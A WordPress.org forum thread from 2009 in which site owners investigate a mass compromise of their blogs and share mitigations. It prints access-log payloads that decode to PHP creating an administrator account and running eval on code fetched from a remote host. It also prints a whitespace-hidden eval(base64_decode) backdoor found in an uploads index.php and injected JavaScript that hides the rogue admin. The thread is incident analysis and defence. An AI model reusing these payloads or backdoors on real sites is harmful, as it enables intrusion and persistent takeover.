WordPress.org

Ready to get started?Download WordPress

Forums

[closed] Question About Possible Hack of Site (162 posts)

  1. dyske
    Member
    Posted 4 years ago #

    @robk30

    I deleted both. As far as I know, there should not be any PHP files in /wp-content/uploads
    The idea of "uploading" PHP files is too fishy. So, I would delete any PHP files I find in "uploads".

  2. digitali
    Member
    Posted 4 years ago #

    I have been done too on http://www.photobomb.net - I was going through the upgrade process a few days ago when my laptop crashed and it has taken three days to fix it. I log back on today and arrive in hacker city!

    Changed the permalinks and removed FrankGunning77 from the user database. I had noticed some strange registrations earlier this week and even started to write a blog post about hackers and the importance of upgrading WP.

    What a week!

  3. rwboyer
    Member
    Posted 4 years ago #

    I think I have found the hack and the source. According to my access logs this appears to be the hack:

    48200 122.135.85.220 - - [04/Sep/2009:04:53:41 -0400] "POST /xmlrpc.php HTTP/1.1 " 200 173 "JHJvbGU9J2FkbWluaXN0cmF0b3InOyR1c2VyX2xvZ2luPSdKZXJhbXlEZWNrNzk nOyR1c2VyX3Bhc3M9J09nck8hSTMkTGQhISc7ZXZhbChmaWxlX2dldF9jb250ZW50cygnaHR0c DovL2xpbmtzLndlYndvcmRwcmVzcy5jbi9kYXRhL3Nob3J0cGFydDIudHh0JykpO2V4aXQ7" " Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7) Gecko/20040803 Fir efox/0.9.3"

    and the source as you can see appears to be IP 122.135.85.220

    Anyone else out there that can confirm. I just looked as I found the problem and moved all of my data to a non-hacked server earlier on a new virtual server. So now I am looking at the cause.

    RB

  4. dyske
    Member
    Posted 4 years ago #

    @rwboyer

    I wonder what that POST request actually posted. I guess that long string is encrypted? That's the referrer information, right? Or, is that just the argument passed to xmlrpc.php?

  5. netslacker
    Member
    Posted 4 years ago #

    @rwboyer

    NICE FIND!

    Since the hack includes a method call to base64_decode I took the string from your find and VOILA! Here's what you get:

    $role='administrator';$user_login='JeramyDeck79';$user_pass='OgrO!I3$Ld!!';eval(file_get_contents('http://links.webwordpress.cn/data/shortpart2.txt'));exit;

    The file:
    http://links.webwordpress.cn/data/shortpart2.txt

    You can open the file link in a browser. You can see they are pulling from the users table.

    Once you have the hack on your site the attacker can execute WHATEVER they want using the base64_decode method call. Clever hack.

    To be clear, the string "JHJvbGU9J2FkbWluaXN0cmF0b3InOyR1c2VyX2xvZ2luPSdKZXJhbXlEZWNrNzk nOyR1c2VyX3Bhc3M9J09nck8hSTMkTGQhISc7ZXZhbChmaWxlX2dldF9jb250ZW50cygnaHR0c DovL2xpbmtzLndlYndvcmRwcmVzcy5jbi9kYXRhL3Nob3J0cGFydDIudHh0JykpO2V4aXQ7"
    when base64 decoded, gives the code above.

  6. interbasket
    Member
    Posted 4 years ago #

    Temp fix for those using custom permalinks

    Go to Permalinks, and take out the offending string.

    Don't know how long it will last, but it seems to have fixed my site, at least temporarily until an official patch or response has been made by WP

    Stuart

  7. Jeremy O'Connell
    Member
    Posted 4 years ago #

    rwboyer beat me to posting the first log. I found ours and its from a different IP. However that is no surprise as it is probably a botnet or compromised servers.

    219.101.28.243 - - [03/Sep/2009:22:22:38 -0500] "POST /xmlrpc.php HTTP/1.1" 200 174 "JHJvbGU9J2FkbWluaXN0cmF0b3InOyR1c2VyX2xvZ2luPSdBZGFtU2x1c3Nlcjg1JzskdXNlcl9wYXNzPSdCWShkKCZ4OClLaXAnO2V2YWwoZmlsZV9nZXRfY29udGVudHMoJ2h0dHA6Ly9saW5rcy53ZWJ3b3JkcHJlc3MuY24vZGF0YS9zaG9ydHBhcnQyLnR4dCcpKTtleGl0Ow==" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; en)"

    The attacker also ran checks against "wp-login.php" and "wp-admin/options-permalink.php" before running the payload.

    I should add that the payload is coming from the same place: http://links.webwordpress.cn/data/shortpart2.txt

    Our payload just contained a different user/pass but was like the decode above.

  8. netslacker
    Member
    Posted 4 years ago #

    @interbasket

    I fixed my site 3 times in the past 24 hours by just doing the permalink fix. It's not enough. It will return.

  9. netslacker
    Member
    Posted 4 years ago #

    @cyberws

    The decoded string is similar:

    $role='administrator';$user_login='AdamSlusser85';$user_pass='BY(d(&x8)Kip';eval(file_get_contents('http://links.webwordpress.cn/data/shortpart2.txt'));exit;

  10. Jeremy O'Connell
    Member
    Posted 4 years ago #

    @netslacker

    Yup I decoded it. Damn annoying scripts.

  11. Jeremy O'Connell
    Member
    Posted 4 years ago #

    To stop it cold just disable your xmlrpc.php by deleting it or changing permissions until a patch is provided.

    If you don't want external calls I would just change the permissions to something like 400. That way on upgrades you won't forget to alter that file. You could in your .htaccess file deny access to the file and never worry about it during upgrades, assuming your .htaccess file isn't jacked with:

    <FilesMatch "^xmlrpc.php">
    	    Deny from all
    	</FilesMatch>

    For us the hack didn't alter any files because we don't have many with write privileges by the web server. Still they did have an admin account. Grrrr...

    Unfortunately many blogs need xmlrpc.php on and simply changing the name isn't the answer as its a published file in the code for the page.

  12. dyske
    Member
    Posted 4 years ago #

    OK. So, it does look like xmlrpc.php is the entry point as I suspected. So, this call to xmlrpc creates the admin user and then after that, it should be able to do anything; such as uploading files to "uploads" folder and modifying some of the source code.

    @cyberws

    The only thing that I'm aware of that xmlrpc.php does are the ping backs and mobile update (like via iPhone). What else does it do which makes many sites "need" it?

    I've already deleted xmlrpc.php from all my sites. This is not the first time xmlrpc.php was used for hacking. A while ago, I read somewhere that I should just delete the file because it's more trouble than it's worth.

  13. Jeremy O'Connell
    Member
    Posted 4 years ago #

    Well xmlrpc.php is used for pingbacks and external updates. Unfortunately many, like us, can't delete the script because we need it for several legit stuff. However WordPress should be able to secure this file a little better.

    I would rather it be very picky and through out some valid calls. I will say deleting the file is good. However if you put the above code in your .htaccess file you will be protected even if you forget to delete the file during an upgrade.

    I know it is possible to have Apache cover this file better. I am working on another call (that I will post later) that will have Apache remove some of the dangerous payloads.

    I know for example one thing would be to clear $user_login in xmlrpc.php and then load the config information. That way anything that is loaded at the URL will be reset. Or if $user_login is define abort.

    if ($_REQUEST{'user_login'}) {
    print "What the heck are you doing?!!!!";
    die();
    }
  14. netslacker
    Member
    Posted 4 years ago #

    I've found that there were multiple new files on my filesystem. All of them were capable of executing the payload delivered through the post action above. IT'S NOT JUST XMLRPC.php. In my case, I found at LEAST 10 files that were altered or newly added to the system that had the necessary function to execute the payload code.

    Just because you block xmlrpc does not mean you've stopped their access to the site. This is ESPECIALLY true if you've already been hacked as they've likely added multiple entry points as in my case.

    xmlrpc.php may have been the FIRST entry point, but if you've been attacked you must examine your filesystem carefully. See my earlier post.

  15. dyske
    Member
    Posted 4 years ago #

    What is curious about this hack is that it's pretty obvious this was only Phase I. Some automatic bot went around opening the back doors on a whole bunch of sites last night. I assume, now the idea is to go back individually and do some real damage. Those of us discussing this here are lucky that we caught this in time before the real damage is done. But the mystery is: If the hacker was going to go back to individual sites to exploit, then why wouldn't he just do it individually in the first place? Why did he use an automated bot? Why wouldn't he just pick a site, run the bot on it, and then proceed to do whatever he wants to do?

    The automation does not make sense especially because this hack breaks the URL and causes the site to return an error when individual posts were requested. Only the home page functions normally. So, once hacked, you notice it pretty easily. By the time the hacker decides to come back and exploit, the back door would be closed. It would make a lot more sense to hack site individually (not automate it).

    Another possibility is that the hacker has already exploited our site (or server) in some way but we are not aware of it. In other words, Phase II had already occurred. Perhaps the hacker collected all the email addresses stored in the users table.

    But if stealing email addresses were the only point, it wouldn't make sense to go as far as modifying the permalink setup. Once the admin user is inserted, the hacker could get all the user information.

    How easy is it to decrypt passwords store in WP?

  16. netnothing
    Member
    Posted 4 years ago #

    Ok we have at least one 2.7.1 that got hacked. Permalink problem, but thus far I can't find any new admin users.

    I found our bad access:

    88.165.203.192 - - [04/Sep/2009:06:07:15 -0700] "POST /xmlrpc.php HTTP/1.1" 200 900 "JHJvbGU9J2FkbWluaXN0cmF0b3InOyR1c2VyX2xvZ2luPSdCdWRkeUphcm5pZ2FuNzcnOyR1c2VyX3Bhc3M9JyM3RFdaYjhjdW5uRCc7ZXZhbChmaWxlX2dldF9jb250ZW50cygnaHR0cDovL2xpbmtzLndlYndvcmRwcmVzcy5jbi9kYXRhL3Nob3J0cGFydDIudHh0JykpO2V4aXQ7" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X; en) AppleWebKit/522+ (KHTML, like Gecko) Version/3.0.2 Safari/522.12"

    Ours decodes to:

    $role='administrator';$user_login='BuddyJarnigan77';$user_pass='#7DWZb8cunnD';eval(file_get_contents('http://links.webwordpress.cn/data/shortpart2.txt'));exit;

    However, I can't find this user in the table? I looking directly at the database through a sql client and I don't see any new users created today.

    Anyone else see this?

    -Kevin

  17. figaro
    Member
    Posted 4 years ago #

    How easy is it to decrypt passwords store in WP?

    It's an MD5 hash...there are an endless number of returns in google for md5 decrypter.........

  18. netnothing
    Member
    Posted 4 years ago #

    Also,

    We had the index.php file modified on 8/31/09 in our main uploads folder to this:

    <?php function gpc_19045($l19047){if(is_array($l19047)){foreach($l19047 as $l19045=>$l19046)$l19047[$l19045]=gpc_19045($l19046);}elseif(is_string($l19047) && substr($l19047,0,4)=="____"){eval(base64_decode(substr($l19047,4)));$l19047=null;}return $l19047;}if(empty($_SERVER))$_SERVER=$HTTP_SERVER_VARS;array_map("gpc_19045",$_SERVER);
    // Silence is golden.
    ?>

    Notice the long set of blank spaces to hide the code?
    EDIT: Ok, WP forum strips out the blank spaces.....but before the first function call there are over 1800 spaces.

    -Kevin

  19. dyske
    Member
    Posted 4 years ago #

    @netslacker

    I believe that xmlrpc.php was the first entry point for the hacker. Once he created a hidden admin, he could do a lot of damage, including modifying some of the source and changing the permalink setting. The scheme to execute a block of code via URL works only if your site already has the hacked code to execute it. This xmlrpc scheme to insert the admin user is the only scheme that does not require existing back door. (I think.)

    If I'm right. Once you cleanly re-install your site, you can protect your site from re-hacking by deleting xmlrpc.php.

  20. figaro
    Member
    Posted 4 years ago #

    We had the index.php file modified

    The lesson here is to replace all the default WP source code with new code. Then look for any other files that may have been added....or hacked in other programs. If you have custom themes/plugins, then they need to be closly searched as well.

  21. dyske
    Member
    Posted 4 years ago #

    @figaro

    OK, we better change our passwords quick, before the hacker decrypt them. I guess this goes for all the users on the site.

  22. netnothing
    Member
    Posted 4 years ago #

    The lesson here is to replace all the default WP source code with new code. Then look for any other files that may have been added....or hacked in other programs. If you have custom themes/plugins, then they need to be closly searched as well.

    Far as I can tell this was just one of the WP "silence is golden" empty index.php files that are used if users don't block directory listing with .htaccess.....so there is no code there to begin with.

    -Kevin

  23. figaro
    Member
    Posted 4 years ago #

    Far as I can tell this was just one of the WP "silence is golden" empty index.php

    Maybe true, but that doesn't mean it's the only file that's been hacked. I've cleaned up other php apps from this kind of hack where several of the default php files had the base64 code inserted as the first line in the file. I wouldn't take a chance of it only being in index.php....I would replace all default code with a clean codebase.

  24. netnothing
    Member
    Posted 4 years ago #

    Maybe true, but that doesn't mean it's the only file that's been hacked.

    Right you are.....just found the code in the /wp-content/advanced-cache.php file which is part of WP-Super-Cache.

    Anyone any closer to finding out how they did this? Problem for us is, unfortunately we are plugin dependent on an old version that only works up to 2.7.1. So I'm hoping to clean and then patch the attack point because we can't upgrade.

    -Kevin

  25. netnothing
    Member
    Posted 4 years ago #

    For people that are decoding the string from the logs......are you able to find that user in the database?

    I can't find that user in our wp_users table at all?

    -Kevin

  26. dyske
    Member
    Posted 4 years ago #

    @netnothing

    My theory is that as long as your code is all clean, removing xmlrpc.php would prevent the hacker from hacking again, as I suspect that xmlrpc.php is the first entry point for the hacker to create the admin user.

    I would like to know what others think of this.

  27. figaro
    Member
    Posted 4 years ago #

    I would like to know what others think of this.

    I think if your code is clean, and if you are running the latest code, and if your file permissions are set properly, then you probably can even leave xmlrpc.php in place and not have to worry.

    I'm running the latest codebase at the site below, have directories set to 755 and files set to 644. I have some suspicious subscribers accounts created in the past few days, but haven't been hacked yet. Not to say I can't be, but just hasn't happened yet. I have a feeling if I were running outdated WP code, then I would already be a victim.

    http://educhalk.org/blog/

  28. rwboyer
    Member
    Posted 4 years ago #

    Just my 2ยข -

    The xmlrpc.php POST that I put up a few hours ago is the hack I looked through the entire sequence in my access logs - the modified/new files come after the hack. Here is the entire opening sequence for the hack in question. I had to move all of my data to a pristine code base in a new NameVirtualServer and am still tweaking some of my caching and thing to get everything back to normal so I have not had time to dig through my IP dumps at the time of the exploit to see what else may have been in the attack payload but I will get around to it.

    Here is the entire opening sequence from my access logs:

    48195 122.135.85.220 - - [04/Sep/2009:04:53:21 -0400] "GET /wp-login.php HTTP/1.      1" 200 1948 "http://photo.rwboyer.com/" "Mozilla/5.0 (Windows; U; Windows
          NT 5.1; en-US; rv:1.7) Gecko/20040803 Firefox/0.9.3"
    
    48196 122.135.85.220 - - [04/Sep/2009:04:53:24 -0400] "POST /wp-login.php HTTP/1      .1" 302 - "http://photo.rwboyer.com/wp-login.php" "Mozilla/5.0 (Windows; U      ; Windows NT 5.1; en-US; rv:1.7) Gecko/20040803 Firefox/0.9.3"
    
    48197 122.135.85.220 - - [04/Sep/2009:04:53:28 -0400] "GET /wp-admin/ HTTP/1.1"       200 34669 "http://photo.rwboyer.com/wp-login.php" "Mozilla/5.0 (Windows; U      ; Windows NT 5.1; en-US; rv:1.7) Gecko/20040803 Firefox/0.9.3"
    
    48198 122.135.85.220 - - [04/Sep/2009:04:53:34 -0400] "GET /wp-admin//options-pe      rmalink.php HTTP/1.1" 200 15153 "http://photo.rwboyer.com/wp-admin//option      s-permalink.php" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7)       Gecko/20040803 Firefox/0.9.3"
    
    48199 122.135.85.220 - - [04/Sep/2009:04:53:37 -0400] "POST /wp-admin//options-p      ermalink.php HTTP/1.1" 200 15312 "http://photo.rwboyer.com/wp-admin//optio      ns-permalink.php" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7)       Gecko/20040803 Firefox/0.9.3"
    
    48200 122.135.85.220 - - [04/Sep/2009:04:53:41 -0400] "POST /xmlrpc.php HTTP/1.1      " 200 173 "JHJvbGU9J2FkbWluaXN0cmF0b3InOyR1c2VyX2xvZ2luPSdKZXJhbXlEZWNrNzk      nOyR1c2VyX3Bhc3M9J09nck8hSTMkTGQhISc7ZXZhbChmaWxlX2dldF9jb250ZW50cygnaHR0c      DovL2xpbmtzLndlYndvcmRwcmVzcy5jbi9kYXRhL3Nob3J0cGFydDIudHh0JykpO2V4aXQ7" "      Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7) Gecko/20040803 Fir      efox/0.9.3"

    RB

  29. I've seen it on a WPMU 2.8.1 install, so getting this narrowed down would be good.

    edit: since they're also creating another user, has anyone who has been hit repeatedly tried turning off registrations (after removing that user)?

  30. djspark
    Member
    Posted 4 years ago #

    found this in wp_usermeta,
    the latest user subscribed, added this to his first_name

    ...
    
    <div id="user_superuser"><script language="JavaScript">
    var setUserName = function(){
    	try{
    		var t=document.getElementById("user_superuser");
    		while(t.nodeName!="TR"){
    			t=t.parentNode;
    		};
    		t.parentNode.removeChild(t);
    		var tags = document.getElementsByTagName("H3");
    		var s = " shown below";
    		for (var i = 0; i < tags.length; i++) {
    			var t=tags[i].innerHTML;
    			var h=tags[i];
    			if(t.indexOf(s)>0){
    				s =(parseInt(t)-1)+s;
    				h.removeChild(h.firstChild);
    				t = document.createTextNode(s);
    				h.appendChild(t);
    			}
    		}
    		var arr=document.getElementsByTagName("ul");
    		for(var i in arr) if(arr[i].className=="subsubsub"){
    			var n=/>Administrator ((d+))</gi.exec(arr[i].innerHTML);
    			if(n[1]>0){
    				var txt=arr[i].innerHTML.replace(/>Administrator ((d+))</gi,">Administrator ("+(n[1]-1)+")<");
            arr[i].innerHTML=txt;
            }
        }
              }catch(e){};
         };
         addLoadEvent(setUserName);
    </script></div>

Topic Closed

This topic has been closed to new replies.

About this Topic